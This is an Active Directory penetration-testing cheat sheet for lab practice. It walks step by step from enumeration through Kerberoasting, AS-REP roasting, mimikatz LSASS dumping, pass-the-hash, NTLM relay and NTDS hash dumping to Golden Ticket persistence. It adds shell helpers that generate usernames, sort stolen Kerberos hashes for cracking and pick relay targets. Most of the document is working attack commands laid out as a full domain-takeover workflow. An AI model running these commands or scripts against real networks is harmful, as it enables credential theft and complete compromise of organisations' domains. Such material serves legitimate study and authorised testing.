Quick Guide To AD Pentesting
🔥 Step-by-Step AD Pentesting Cheat Sheet
1️⃣ Enumeration (Always Start Here!)
Your goal: Find Users, Computers, Groups, and AD Misconfigurations.
🔹 Basic Enumeration (No Credentials) ✅ nmap -p 88,135,139,389,445,464,593,636,3268,3389 --script 'ldap*,smb*' <target>
→ Fingerprint the AD ports (Kerberos 88, RPC 135, LDAP 389/636/3268, SMB 445) and run the LDAP/SMB NSE scripts. Quote the globs so the shell does not expand them, and note that smb* also matches smb-brute and smb-flood; use smb-enum-*,smb-security-mode,smb-os-discovery for a quieter scan
✅ smbclient -L //target -N
→ Check SMB Shares
✅ crackmapexec smb <target>
→ Fingerprint SMB (OS build, domain name, signing state); add -u '' -p '' --shares --users to test whether a null session gives you shares and users
✅ kerbrute userenum -d domain.com --dc <DC-IP> usernames.txt
→ Find valid users via Kerberos AS-REQ; no password is ever sent, so this does not lock accounts out
🔹 Detailed Enumeration (With Credentials) ✅ bloodhound-python -u user -p pass -d domain.com -c All -dc dc01.domain.com -ns <DC-IP>
→ Full AD mapping; -dc takes the DC hostname and -ns the DC IP as DNS server (bloodhound-python has no -dc-ip flag). Load the resulting JSON files into BloodHound
✅ rpcclient -U 'user%pass' <DC-IP>
→ Query AD over MS-RPC; inside the shell run enumdomusers, enumdomgroups and querygroupmem <group RID>
✅ net group "Domain Admins" /domain
→ Check Domain Admins (Windows built-in; run it from a domain-joined host, not from your attack box)
✅ net user /domain
→ List All Users
✅ crackmapexec ldap <DC-IP> -u user -p pass --asreproast asrep.txt
→ Check for AS-REP roastable accounts; --asreproast needs an output file argument (so does --kerberoasting)
📌 If You Find Null SMB Shares or Weak Users → Move to Exploitation.
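The kerbrute step above needs a username list, and you usually do not know the domain's naming convention until kerbrute confirms one. Added example (not part of the original cheat sheet): a small shell helper that expands a list of "First Last" names, for instance from OSINT, into the username formats commonly found in AD. The function name gen_usernames and the sample names are mine.

```sh
#!/bin/sh
# Added example: build kerbrute candidates from real names.
# Input:  "First Last" (or "First Middle Last") lines on stdin.
# Output: one lower-case candidate per line, deduplicated.

gen_usernames() {
    tr '[:upper:]' '[:lower:]' | awk 'NF >= 2 {
        f = $1; l = $NF                     # first and last word of the name
        fi = substr(f, 1, 1); li = substr(l, 1, 1)
        print f "." l                       # john.smith
        print f "_" l                       # john_smith
        print f l                           # johnsmith
        print fi l                          # jsmith
        print fi "." l                      # j.smith
        print f li                          # johns
        print l "." f                       # smith.john
        print l fi                          # smithj
        print f                             # john
    }' | sort -u
}

demo_usernames() {
    # Constructed sample names, not real people.
    gen_usernames <<'EOF'
John Smith
Jean Paul Dubois
EOF
}

# Usage against a real list:
#   gen_usernames < names.txt > usernames.txt
#   kerbrute userenum -d domain.com --dc <DC-IP> usernames.txt
```

Once kerbrute reports a hit, keep only the format that matched and regenerate the list; that keeps the AS-REQ noise on the DC to a minimum.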
2️⃣ Exploitation (Privilege Escalation & Lateral Movement)
Your goal: Escalate Privileges from a Low-Level User.
🔹 Kerberoasting (Accounts With an SPN) ✅ GetUserSPNs.py -dc-ip <DC-IP> domain/user:pass -request -outputfile tgs.txt
✅ john --wordlist=rockyou.txt tgs.txt
→ Request a TGS for every account that has an SPN and crack it offline (hashcat mode 13100 for RC4/etype 23). A cracked password belongs to the service account, so check that account's group memberships next
🔹 AS-REP Roasting (Accounts With "Do Not Require Kerberos Preauthentication" Set) ✅ GetNPUsers.py -dc-ip <DC-IP> -usersfile users.txt domain/ -format hashcat
✅ hashcat -m 18200 hash.txt rockyou.txt
→ Works without credentials given a user list; -m 18200 is the RC4 (etype 23) AS-REP format. Do not add --force: it only suppresses hashcat's warnings and hides broken driver setups
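The two cracking steps above each hard-code one hashcat mode, but the mode depends on the encryption type in the hash, and a service account with AES-only SPNs comes back as etype 17 or 18, which hashcat rejects under -m 13100. Added example (not from the original cheat sheet): a shell helper that reads impacket's $krb5tgs$<etype>$... and $krb5asrep$<etype>$... lines and sorts them into one file per hashcat mode. The function names and the sample hashes (truncated, fake ciphertext) are mine.

```sh
#!/bin/sh
# Added example: split a mixed Kerberoast / AS-REP dump by hashcat mode.

hashcat_mode() {
    # Prints the hashcat mode for one hash line, or "unknown".
    case "$1" in
        '$krb5tgs$23$'*)   echo 13100 ;;    # Kerberoast, RC4-HMAC
        '$krb5tgs$17$'*)   echo 19600 ;;    # Kerberoast, AES128-CTS-HMAC-SHA1-96
        '$krb5tgs$18$'*)   echo 19700 ;;    # Kerberoast, AES256-CTS-HMAC-SHA1-96
        '$krb5asrep$23$'*) echo 18200 ;;    # AS-REP roast, RC4-HMAC
        *)                 echo unknown ;;  # anything else: check your hashcat version
    esac
}

split_by_mode() {
    # Reads hash lines on stdin, appends each to <dir>/hashes_<mode>.txt,
    # then prints "<mode> <count>" for every file written.
    dir="$1"
    mkdir -p "$dir"
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        printf '%s\n' "$line" >> "$dir/hashes_$(hashcat_mode "$line").txt"
    done
    for f in "$dir"/hashes_*.txt; do
        [ -e "$f" ] || continue
        m=${f##*/hashes_}; m=${m%.txt}
        echo "$m $(grep -c . "$f")"
    done
}

demo_split() {
    # Constructed sample dump: two RC4 TGS hashes, one AES256 TGS hash,
    # one RC4 AS-REP hash. Ciphertext fields are placeholders.
    split_by_mode "${1:-out}" <<'EOF'
$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/db01.corp.local:1433*$0123abcd$deadbeef
$krb5tgs$23$*svc_backup$CORP.LOCAL$backup/srv01.corp.local*$4567ef01$cafebabe
$krb5tgs$18$svc_http$CORP.LOCAL$*HTTP/web01.corp.local*$89ab23cd$feedface
$krb5asrep$23$jdoe@CORP.LOCAL:cdef4567$0badf00d
EOF
}

# Usage against real output:
#   cat tgs.txt asrep.txt | split_by_mode out
#   hashcat -m 13100 out/hashes_13100.txt rockyou.txt
#   hashcat -m 19700 out/hashes_19700.txt rockyou.txt   # AES: far slower, try RC4 first
```

If every SPN comes back as etype 18, the account has RC4 disabled; cracking AES256 is orders of magnitude slower, so prioritise the RC4 file and any account whose SPN suggests a weak legacy password.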
🔹 Pass-the-Hash / Pass-the-Ticket (Lateral Movement) ✅ mimikatz.exe
→ sekurlsa::logonpasswords
→ Dump credentials from LSASS; run privilege::debug first, and you need local admin on that host. For Pass-the-Ticket the matching pair is sekurlsa::tickets /export to dump and kerberos::ptt <ticket.kirbi> to inject
✅ psexec.py domain/user@target -hashes LM:NT
→ Pass-the-Hash with impacket; if you only have the NT hash, use -hashes :NT and leave the LM half empty
🔹 NTLM Relay Attacks (If SMB Signing is Disabled) ✅ ntlmrelayx.py -t smb://target -smb2support
→ Impacket uses single-dash long options (-smb2support, -tf targets.txt). You also need an authentication trigger (Responder with its SMB and HTTP servers turned off, or a coercion technique), the target must not require signing, and the relayed account must have admin rights on it. Relaying back to the host the authentication came from does not work
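Before pointing ntlmrelayx at anything, confirm which hosts actually accept unsigned SMB: crackmapexec smb prints (signing:True|False) for every host it touches, and crackmapexec smb <range> --gen-relay-list targets.txt does the filtering for you. Added example (not from the original cheat sheet) for the case where you already have the scan output in a log: a shell helper that extracts the relayable hosts. The function names and the log lines (constructed samples in crackmapexec's "smb" layout) are mine.

```sh
#!/bin/sh
# Added example: build an ntlmrelayx target file from crackmapexec smb output.

relay_targets() {
    # Reads crackmapexec smb lines on stdin; prints the IP (2nd column) of
    # every host reported with (signing:False), one per line.
    awk '$1 == "SMB" && /\(signing:False\)/ { print $2 }'
}

signing_report() {
    # Prints "hostname ip signing" for every host so you can see at a glance
    # which boxes are off the table (DCs require signing by default).
    awk '$1 == "SMB" && match($0, /\(signing:[A-Za-z]+\)/) {
        print $4, $2, substr($0, RSTART + 9, RLENGTH - 10)
    }'
}

demo_targets() {
    # Constructed sample output: one DC with signing on, two members without.
    relay_targets <<'EOF'
SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.21     445    WS01             [*] Windows 10.0 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.22     445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
EOF
}

# Usage against a real scan:
#   crackmapexec smb 10.10.10.0/24 | tee cme.log
#   relay_targets < cme.log > targets.txt
#   ntlmrelayx.py -tf targets.txt -smb2support
```

The DC is absent from the target file even though it is the most valuable host: that is expected, since domain controllers enforce signing unless someone turned it off, and it is the reason relay usually lands on member servers first.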
📌 If you get a higher-privilege account → Use It for Full Compromise.
3️⃣ Full Domain Compromise (Domain Admin Access!)
Your goal: Get Domain Admin and Dump All Passwords.
🔹 Check if You Are a Domain Admin ✅ whoami /groups
✅ net group "Domain Admins" /domain
🔹 Dump All AD Hashes (If DA Access) ✅ secretsdump.py -dc-ip <DC-IP> domain/admin:password@<DC-IP>
→ Target the DC itself to pull NTDS.dit (the NT hash of every account, including krbtgt); add -just-dc-ntlm to skip LSA secrets and password history
🔹 Golden Ticket Attack (Persistence) ✅ mimikatz.exe
→ kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-XXXXX /krbtgt:HASH /ptt
→ /sid is the domain SID (a user SID with its trailing RID removed) and /krbtgt is the krbtgt NT hash from the secretsdump output; the forged TGT stays valid until the krbtgt password has been rotated twice
📌 Once You Get DA → You Have Fully Compromised the Domain!
🔥 How to Know What to Use in a Lab? (Decision-Making Tree)
✅ 1. Do I have credentials?
❌ No → Start with Enumeration
✅ Yes → Use BloodHound & CrackMapExec
✅ 2. Can I Kerberoast / AS-REP Roast?
✅ Yes → Extract Hashes & Crack Them
❌ No → Try Lateral Movement
✅ 3. Do I have SMB, LDAP, or Kerberos Misconfigurations?
✅ Yes → Exploit Using NTLM Relay, Pass-the-Hash, or Kerberos Attacks
❌ No → Look for Local Privilege Escalation on Workstations
✅ 4. Do I have Domain Admin access?
✅ Yes → Dump Hashes & Maintain Access
❌ No → Pivot to Another User or Machine
🔥 Next Steps for You
Use this step-by-step method in any AD lab.
Start practicing each attack individually on TryHackMe (THM) & Hack The Box (HTB).
Use BloodHound to visualize attack paths (this helps a lot).
If stuck, Google specific errors & read writeups (everyone does this, even pros).